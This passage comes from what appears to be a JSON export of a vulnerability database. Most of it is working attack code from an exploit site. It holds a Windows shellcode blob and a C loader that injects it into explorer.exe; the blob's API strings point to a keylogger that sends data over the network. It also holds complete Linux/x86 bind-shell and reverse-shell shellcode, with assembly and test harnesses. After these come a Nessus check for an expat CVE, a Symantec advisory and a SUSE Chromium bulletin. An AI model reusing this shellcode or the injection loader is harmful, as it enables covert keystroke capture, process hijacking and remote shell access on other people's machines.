8\\x41\\xb0\\x11\\x48\\x8b\\x5f\\x48\\xff\\xd3\\x48\\x89\\x47\\x08\\x48\\x8b\\x1f\\x48\\x31\\xc9\\xff\\xd3\\x41\\xc6\\x07\\x02\\x66\\x41\\xc7\\x47\\x02\\xdb\\x83\\x41\\xc7\\x47\\x04\\xc1\\xa1\\xc1\\x63\\x4d\\x31\\xc9\\x41\\x51\\x41\\x51\\x59\\x5a\\xb1\\x0d\\x49\\x89\\xc0\\xb2\\xbc\\x4c\\x01\\xea\\x48\\x8b\\x5f\\x10\\xff\\xd3\\x49\\x8d\\x4c\\x24\\x08\\x48\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x48\\x8b\\x5f\\x28\\xff\\xd3\\x49\\x8d\\x4c\\x24\\x08\\x48\\x8b\\x5f\\x30\\xff\\xd3\\x49\\x8d\\x4c\\x24\\x08\\x48\\x8b\\x5f\\x38\\xff\\xd3\\xeb\\xd4\\x47\\x65\\x74\\x4d\\x6f\\x64\\x75\\x6c\\x65\\x48\\x61\\x6e\\x64\\x6c\\x65\\x41\\x01\\x4c\\x6f\\x61\\x64\\x4c\\x69\\x62\\x72\\x61\\x72\\x79\\x41\\x01\\x53\\x65\\x74\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x48\\x6f\\x6f\\x6b\\x45\\x78\\x41\
\x01\\x43\\x61\\x6c\\x6c\\x4e\\x65\\x78\\x74\\x48\\x6f\\x6f\\x6b\\x45\\x78\\x01\\x47\\x65\\x74\\x4b\\x65\\x79\\x53\\x74\\x61\\x74\\x65\\x01\\x47\\x65\\x74\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x41\\x01\\x54\\x72\\x61\\x6e\\x73\\x6c\\x61\\x74\\x65\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x01\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x41\\x01\\x57\\x53\\x41\\x53\\x74\\x61\\x72\\x74\\x75\\x70\\x01\\x73\\x6f\\x63\\x6b\\x65\\x74\\x01\\x73\\x65\\x6e\\x64\\x74\\x6f\\x01\\x56\\x57\\x41\\x50\\x52\\x41\\x51\\x51\\x41\\x5b\\x48\\x31\\xdb\\x53\\x53\\x5a\\x58\\x8b\\x59\\x3c\\x48\\x01\\xcb\\xb2\\x88\\x8b\\x04\\x13\\x48\\x01\\xc8\\x48\\x31\\xd2\\x52\\x52\\x52\\x41\\x58\\x41\\x59\\x41\\x5a\\x44\\x8b\\x40\\x20\\x4d\\x01\\xd8\\x44\\x8b\\x48\\x24\\x4d\\x01\\xd9\\x44\\x8b\\x50\\x1c\\x4d\\x01\\xda\\x48\\x31\\xd2\\x48\\x31\\xf6\\x56\\x59\\x41\\x8b\\x34\\x90\\x4c\\x01\\xde\\x48\\x8b\\x7c\\x24\\x08\\x48\\x31\\xc0\\x8a\\x04\\x0f\\x48\\xff\\xc1\\x3c\\x01\\x75\\xf6\\x48\\xff\\xc2\\x51\\x48\\xff\\xc9\\x48\\x87\\xf7\\xf3\\xa6\\x59\\x75\\xd3\\x48\\xff\\xca\\x48\\x8b\\x7c\\x24\\x08\\x48\\x01\\xcf\\x48\\x89\\x7c\\x24\\x08\\x48\\x31\\xdb\\x53\\x58\\x66\\x41\\x8b\\x1c\\x51\\x41\\x8b\\x04\\x9a\\x4c\\x01\\xd8\\x48\\x8b\\x1c\\x24\\x48\\x89\\x03\\x48\\x83\\xc3\\x08\\x48\\x89\\x1c\\x24\\x48\\x8b\\x5c\\x24\\x10\\x48\\xff\\xcb\\x48\\x89\\x5c\\x24\\x10\\x48\\x31\\xd2\\x48\\x39\\xd3\\x75\\x8e\\x48\\x83\\xc4\\x18\\x5f\\x5e\\xc3\\x48\\x83\\xec\\x58\\x41\\x50\\x52\\x51\\x48\\x31\\xf6\\x48\\xb8\\x48\\x45\\x52\\x45\\x49\\x54\\x49\\x53\\x4c\\x8b\\x14\\x34\\x48\\xff\\xc6\\x49\\x39\\xc2\\x75\\xf4\\x48\\x83\\xc6\\x07\\x48\\x8d\\x1c\\x34\\x48\\x8b\\x3b\\x4c\\x8b\\x63\\x08\\x4c\\x8b\\x7b\\x10\\x48\\x85\\xc9\\x75\\x68\\x48\\x31\\xdb\\xb3\\x01\\x48\\xc1\\xe3\\x08\\x48\\x39\\xda\\x75\\x5a\\x48\\x8b\\x5f\\x20\\x48\\x31\\xc9\\xb1\\x14\\xff\\xd3\\x66\\x41\\x89\\x04\\x24\\x48\\x8b\\x5f\\x20\\x48\\x31\\xc9\\xb1\\x10\\xff\\xd3\\x66\\x41\\x89\\x44\\x24\\x02\\x48\\x8b\\x5c\\x24\\x10\\x8b\\x03\\x41\\x89\
\x44\\x24\\x04\\x48\\x83\\xec\\x58\\x48\\x8b\\x4f\\x08\\x41\\x54\\x5a\\x4d\\x31\\xc9\\x41\\x51\\x41\\x58\\x41\\xb0\\x10\\x4c\\x89\\x7c\\x24\\x20\\x4c\\x89\\x44\\x24\\x28\\x49\\x83\\xe8\\x08\\x48\\x8b\\x5f\\x50\\xff\\xd3\\x48\\x83\\xc4\\x58\\x5a\\x41\\x58\\x41\\x59\\x48\\x8b\\x5f\\x18\\x48\\x31\\xc9\\xff\\xd3\\x48\\x83\\xc4\\x58\\xc3\";\r\n \r\n \r\n \r\nint main()\r\n{\r\n HANDLE s,proc;\r\n PROCESSENTRY32 ps;\r\n BOOL process_found=0;\r\n LPVOID shell;\r\n SIZE_T total;\r\n \r\n //finding explorer.exe pid (note: the snapshot handle s is never closed; the same variable is reused for the thread handle below)\r\n \r\n ps.dwSize=sizeof(ps);\r\n \r\n s=CreateToolhelp32Snapshot(2,0);\r\n \r\n if(s==INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"CreateToolhelp32Snapshot() failed.Error code %d\\n\",GetLastError());\r\n return -1;\r\n }\r\n \r\n if(!Process32First(s,&ps))\r\n {\r\n printf(\"Process32First() failed.Error code %d\\n\",GetLastError());\r\n return -1;\r\n }\r\n \r\n \r\n do{\r\n if(0==strcmp(ps.szExeFile,\"explorer.exe\"))\r\n {\r\n process_found=1;\r\n break;\r\n }\r\n }while(Process32Next(s,&ps));\r\n \r\n \r\n if(!process_found)\r\n {\r\n printf(\"Unknown Process\\n\");\r\n return -1;\r\n }\r\n \r\n \r\n //opening process using pid (note: OpenProcess returns NULL on failure, not INVALID_HANDLE_VALUE, so the check below does not catch a failed open)\r\n \r\n \r\n proc=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID);\r\n \r\n if(proc==INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"OpenProcess() failed.Error code %d\\n\",GetLastError());\r\n return -1;\r\n } \r\n \r\n \r\n //allocating RWX memory in the target process for the shellcode\r\n \r\n if( (shell=VirtualAllocEx(proc,NULL,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE)) == NULL)\r\n {\r\n printf(\"Failed to allocate memory into process\");\r\n CloseHandle(proc);\r\n return -1;\r\n }\r\n \r\n \r\n //writing shellcode into process memory\r\n \r\n WriteProcessMemory(proc,shell,shellcode,sizeof(shellcode),&total);\r\n \r\n if(sizeof(shellcode)!=total)\r\n {\r\n printf(\"Failed write shellcode into process memory\");\r\n CloseHandle(proc);\r\n return -1;\r\n }\r\n \r\n \r\n //Executing shellcode\r\n \r\n 
if((s=CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0))==NULL)\r\n {\r\n printf(\"Failed to Execute shellcode\");\r\n CloseHandle(proc);\r\n return -1;\r\n }\r\n \r\n CloseHandle(proc);\r\n CloseHandle(s);\r\n \r\n return 0;\r\n \r\n \r\n}\n\n# 0day.today [2018-10-30] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31462"}, {"lastseen": "2018-06-01T01:08:24", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2018-05-31T00:00:00", "published": "2018-05-31T00:00:00", "id": "1337DAY-ID-30511", "href": "https://0day.today/exploit/description/30511", "title": "Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes)", "type": "zdt", "sourceData": "/*\r\n; Filename: tcp_bind_shellcode_light.nasm\r\n; Author: Paolo Perego <[email\u00a0protected]>\r\n; Website: https://codiceinsicuro.it\r\n; Twitter: @thesp0nge\r\n; SLAE-ID: 1217\r\n; Purpose: binds on TCP port 4444 and spawn a shell on incoming\r\nconnections.\r\n \r\n \r\nglobal _start\r\n \r\nsection .text\r\n \r\n_start:\r\n; Creating the socket.\r\n;\r\n; int socket(int domain, int type, int protocol);\r\n;\r\n; socket() is defined as #define __NR_socket 359 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n; AF_INET is defined as 2 in /usr/include/i386-linux-gnu/bits/socket.h\r\n; SOCK_STREAM is defined as 1 in\r\n/usr/include/i386-linux-gnu/bits/socket_type.h\r\nxor eax, eax\r\nmov ebx, eax\r\nmov ecx, eax\r\nmov edx, eax\r\n \r\nmov ax, 0x167 ; 359 in decimal\r\nmov bl, 0x2\r\nmov cl, 0x1\r\n \r\nint 0x80 ; sfd = socket(AF_INET, SOCK_STREAM, 0);\r\nmov ebx, eax ; storing the socket descriptor into EBX for next syscall\r\n \r\n;push eax ; save socket descriptor into the stack\r\n \r\n; Binding the socket to 0.0.0.0 address at port 4444\r\n;\r\n; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);\r\n;\r\n;\r\n; bind() is defined as #define __NR_bind 361 
on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n \r\nxor eax, eax\r\nmov ax, 0x169 ; 361 in decimal\r\nxor ecx, ecx\r\npush ecx ; pushing 32 bit INADDR_ANY\r\npush word 0x5c11 ; pushing PORT 4444 in network byte order\r\npush word 0x2 ; pushing AF_INET as sin_family\r\n \r\nmov ecx, esp ; now ECX points to the my_addr data structure\r\nmov dl, 0x10 ; sizeof(my_addr) = 16 bytes\r\nint 0x80 ; bind(sfd, (struct sockaddr *) &my_addr, sizeof(my_addr));\r\n \r\n; Listening on opened socket bound to port 4444\r\n;\r\n; int listen(int sockfd, int backlog);\r\n;\r\n; listen() is defined as #define __NR_listen 363 in\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\nxor ecx, ecx\r\nxor eax, eax\r\nmov ax, 0x16b ; 363 in decimal\r\nint 0x80 ; listen(sfd, 0);\r\n \r\n; Accepting incoming connection on listening socket\r\n;\r\n; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);\r\n;\r\n; accept() is not defined as syscall in\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h.\r\n; Instead accept4() is defined as #define __NR_accept4 364.\r\n;\r\n; From the man page, accept4() has the following prototype:\r\n; int accept4(int sockfd, struct sockaddr *addr, socklen_t *addrlen, int\r\nflags);\r\n;\r\n; The last integer, as from the man page, if set to 0 makes the\r\n; accept4() call behave the same as accept()\r\nxor eax, eax\r\nmov ax, 0x16c ; 364 in decimal\r\n \r\npush ecx ; ECX is 0, pushing on the stack\r\n \r\nmov esi, ecx\r\nmov ecx, esp ; ECX now points to a zero bytes region from the stack.\r\nmov edx, esp\r\n \r\nint 0x80 ; cfd = accept4(sfd, addr, addrlen, 0); addr and addrlen both point at the zero dword pushed above\r\n \r\nmov ebx, eax ; Saving socket descriptor resulting from accept4 into EBX\r\n \r\n; Duplicating descriptor 0, 1, 2 to the socket opened by client\r\n;\r\n; int dup2(int oldfd, int newfd);\r\n;\r\n; dup2 is defined as #define __NR_dup2 63 in\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n \r\nxor ecx, ecx\r\nmov cl, 2\r\nxor eax, eax\r\n \r\ndup2:\r\nmov al, 0x3F ; 63 in 
decimal\r\nint 0x80 ; duplicating file descriptors in backwards order; from 2 to 0\r\ndec ecx\r\njns dup2\r\n \r\n; Executing shell\r\n;\r\n; int execve(const char *filename, char *const argv[], char *const envp[]);\r\n; execve() is defined as #define __NR_execve 11 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n \r\nxor eax, eax\r\npush eax ; The NULL byte\r\npush 0x68732f2f ; \"sh//\". The second '/' is used to align our command into\r\nthe stack\r\npush 0x6e69622f ; \"nib/\"\r\nmov ebx, esp ; EBX now points to \"/bin//sh\"\r\nxor ecx, ecx\r\nxor edx, edx\r\nmov al, 0xB ; 11 in decimal\r\nint 0x80\r\n \r\n; NOTE: the byte string below encodes push word 0xb315 (\\x66\\x68\\x15\\xb3), i.e. it binds\r\n; port 5555, not the push word 0x5c11 / port 4444 shown in the listing above.\r\n */\r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\nunsigned char code[] = \\\r\n \r\n \"\\x31\\xc0\\x89\\xc3\\x89\\xc1\\x89\\xc2\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x89\\xc3\\x31\\xc0\\x66\\xb8\\x69\\x01\\x31\\xc9\\x51\\x66\\x68\\x15\\xb3\\x66\\x6a\\x02\\x89\\xe1\\xb2\\x10\\xcd\\x80\\x31\\xc9\\x31\\xc0\\x66\\xb8\\x6b\\x01\\xcd\\x80\\x31\\xc0\\x66\\xb8\\x6c\\x01\\x51\\x89\\xce\\x89\\xe1\\x89\\xe2\\xcd\\x80\\x89\\xc3\\x31\\xc9\\xb1\\x02\\x31\\xc0\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xb0\\x0b\\xcd\\x80\";\r\n \r\n \r\n \r\nint main(int argc, char **argv)\r\n{\r\nprintf(\"Shellcode Length: %d\\n\", strlen(code));\r\nint (*ret)() = (int(*)())code;\r\nret();\r\n}\r\n \r\n \r\n \r\n-- \r\n$ cd /pub\r\n$ more beer\r\n \r\nI pirati della sicurezza applicativa: https://codiceinsicuro.it\n\n# 0day.today [2018-06-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30511"}, {"lastseen": "2018-05-15T02:35:38", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2018-05-14T00:00:00", "published": "2018-05-14T00:00:00", "id": "1337DAY-ID-30347", "href": "https://0day.today/exploit/description/30347", "title": "Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) #Shell 
#Shellcode (96 Bytes)", "type": "zdt", "sourceData": "/*\r\n; Title: Linux/x86 - TCP reverse shell\r\n; Author: Paolo Perego <[email\u00a0protected]>\r\n; Website: https://codiceinsicuro.it\r\n; Blog post:\r\nhttps://codiceinsicuro.it/slae/assignment-2-create-a-reverse-shellcode/\r\n; Twitter: @thesp0nge\r\n; SLAE-ID: 1217\r\n; Purpose: connect to a given IP and PORT and spawn a reverse shell if the\r\n; connection succeeded\r\n \r\n \r\nglobal _start\r\n \r\nsection .text\r\n \r\n_start:\r\n \r\n; Creating the socket.\r\n;\r\n; int socket(int domain, int type, int protocol);\r\n;\r\n; socket() is defined as #define __NR_socket 359 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n; AF_INET is defined as 2 in /usr/include/i386-linux-gnu/bits/socket.h\r\n; SOCK_STREAM is defined as 1 in\r\n/usr/include/i386-linux-gnu/bits/socket_type.h\r\nxor eax, eax\r\nxor ebx, ebx\r\nxor ecx, ecx\r\nxor edx, edx\r\n \r\nmov ax, 0x167\r\nmov bl, 0x2\r\nmov cl, 0x1\r\nint 0x80 ; sfd = socket(AF_INET, SOCK_STREAM, 0);\r\nmov ebx, eax ; storing the socket descriptor into EBX for next syscall\r\n \r\n; Connect to my peer\r\n;\r\n; connect() is defined as #define __NR_connect 362 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n; peer.sin_family = AF_INET;\r\n; peer.sin_port = htons(DPORT);\r\n; peer.sin_addr.s_addr = inet_addr(IP);\r\n; ret = connect(sfd, (const struct sockaddr *)&peer, sizeof(struct\r\nsockaddr_in));\r\n \r\n; 127 = 0x7f\r\n; 0 = 0x0\r\n; 0 = 0x0\r\n; 1 = 0x1\r\n \r\n; push 0x0100007f (127.0.0.1) without a NUL byte in the opcode stream:\r\n; 0xfeffff80 is its bitwise complement, and xor with 0xffffffff restores it\r\nmov eax, 0xfeffff80\r\nxor eax, 0xffffffff\r\npush eax\r\npush word 0x5c11 ; port 4444 is 0x115c; pushed byte-swapped (0x5c11) so it lands in network byte order\r\npush word 0x2 ; AF_INET is 2\r\n \r\nmov ecx, esp\r\nmov dl, 0x10 ; sizeof(struct sockaddr_in)\r\nxor eax, eax\r\nmov ax, 0x16a\r\nint 0x80\r\n \r\ntest eax, eax ; connect() returns 0 on success, -errno otherwise\r\njnz exit_on_error\r\n \r\n; Duplicating descriptor 0, 1, 2 to the socket opened by client\r\n;\r\n; int dup2(int oldfd, int newfd);\r\n;\r\n; dup2 is defined as #define __NR_dup2 63 
in\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n \r\nxor ecx, ecx\r\nmov cl, 2\r\nxor eax, eax\r\n \r\ndup2:\r\nmov al, 0x3F ; 63 in decimal\r\nint 0x80 ; duplicating file descriptors in backwards order; from 2 to 0\r\ndec ecx\r\njns dup2\r\n \r\n; Executing shell\r\n;\r\n; int execve(const char *filename, char *const argv[], char *const envp[]);\r\n; execve() is defined as #define __NR_execve 11 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n \r\nxor eax, eax\r\npush eax ; The NULL byte\r\npush 0x68732f2f ; \"sh//\". The second '\\' is used to align our command into\r\nthe stack\r\npush 0x6e69622f ; \"nib/\"\r\nmov ebx, esp ; EBX now points to \"/bin//sh\"\r\nxor ecx, ecx\r\nxor edx, edx\r\nmov al, 0xB ; 11 in decimal\r\nint 0x80\r\n \r\nexit_on_error:\r\nmov bl, 0x1\r\nxor eax, eax ; zero-ing EAX\r\nmov al, 0x1\r\nint 0x80\r\n*/\r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\nunsigned char code[] = \\\r\n\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x89\\xc3\\xb8\\x80\\xff\\xff\\xfe\\x83\\xf0\\xff\\x50\\x66\\x68\\x11\\x5c\\x66\\x6a\\x02\\x89\\xe1\\xb2\\x10\\x31\\xc0\\x66\\xb8\\x6a\\x01\\xcd\\x80\\x85\\xc0\\x75\\x24\\x31\\xc9\\xb1\\x02\\x31\\xc0\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xb0\\x0b\\xcd\\x80\\xb3\\x01\\x31\\xc0\\xb0\\x01\\xcd\\x80\";\r\n \r\n \r\nint main(int argc, char **argv)\r\n{\r\nprintf(\"Shellcode Length: %d\\n\", strlen(code));\r\nint (*ret)() = (int(*)())code;\r\nret();\r\n}\n\n# 0day.today [2018-05-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30347"}], "nessus": [{"lastseen": "2019-11-01T02:06:28", "bulletinFamily": "scanner", "description": "According to the version of the expat packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerability :\n\n - An out-of-bounds read flaw was found 
in the way Expat\n processed certain input. A remote attacker could send\n specially crafted XML that, when parsed by an\n application using the Expat library, would cause that\n application to crash or, possibly, execute arbitrary\n code with the permission of the user running the\n application.(CVE-2016-0718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1446.NASL", "href": "https://www.tenable.com/plugins/nessus/124949", "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization 3.0.1.0 : expat (EulerOS-SA-2019-1446)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124949);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/06/27 13:33:25\");\n\n script_cve_id(\n \"CVE-2016-0718\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : expat (EulerOS-SA-2019-1446)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the expat packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerability :\n\n - An out-of-bounds read flaw was found in the way Expat\n processed certain input. 
A remote attacker could send\n specially crafted XML that, when parsed by an\n application using the Expat library, would cause that\n application to crash or, possibly, execute arbitrary\n code with the permission of the user running the\n application.(CVE-2016-0718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1446\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c2493683\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected expat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"expat-2.1.0-10.h1\",\n \"expat-devel-2.1.0-10.h1\",\n \"expat-static-2.1.0-10.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"expat\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2018-11-14T02:16:08", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. 
A local attacker can exploit this issue to execute arbitrary code with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1709 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. 
Grant local access for trusted and accountable users only.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-11-13T00:00:00", "published": "2018-11-13T00:00:00", "id": "SMNTC-105805", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/105805", "title": "Microsoft Windows COM CVE-2018-8550 Local Privilege Escalation Vulnerability", "type": "symantec", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2018-09-08T13:50:15", "bulletinFamily": "unix", "description": "This update for Chromium to version 69.0.3497.81 fixes multiple issues.\n\n Security issues fixed (boo#1107235):\n\n - CVE-2018-16065: Out of bounds write in V8\n - CVE-2018-16066: Out of bounds read in Blink\n - CVE-2018-16067: Out of bounds read in WebAudio\n - CVE-2018-16068: Out of bounds write in Mojo\n - CVE-2018-16069: Out of bounds read in SwiftShader\n - CVE-2018-16070: Integer overflow in Skia\n - CVE-2018-16071: Use after free in WebRTC\n - CVE-2018-16073: Site Isolation bypass after tab restore\n - CVE-2018-16074: Site Isolation bypass using Blob URLs\n - Out of bounds read in Little-CMS\n - CVE-2018-16075: Local file access in Blink\n - CVE-2018-16076: Out of bounds read in PDFium\n - CVE-2018-16077: Content security policy bypass in Blink\n - CVE-2018-16078: Credit card information leak in Autofill\n - CVE-2018-16079: URL spoof in permission dialogs\n - CVE-2018-16080: URL spoof in full screen mode\n - CVE-2018-16081: Local file access in DevTools\n - CVE-2018-16082: Stack buffer overflow in SwiftShader\n - CVE-2018-16083: Out of bounds read in WebRTC\n - CVE-2018-16084: User confirmation bypass in external protocol handling\n - CVE-2018-16085: Use after free in Memory Instrumentation\n - CVE-2017-15430: Unsafe navigation in Chromecast (boo#1106341)\n - CVE-2018-16086: Script injection in New Tab Page\n - CVE-2018-16087: Multiple download restriction bypass\n 
- CVE-2018-16088: User gesture requirement bypass\n\n The re2 regular expression library was updated to the current version\n 2018-09-01.\n\n", "modified": "2018-09-08T12:13:32", "published": "2018-09-08T12:13:32", "id": "OPENSUSE-SU-2018:2664-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-09/msg00017.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}]}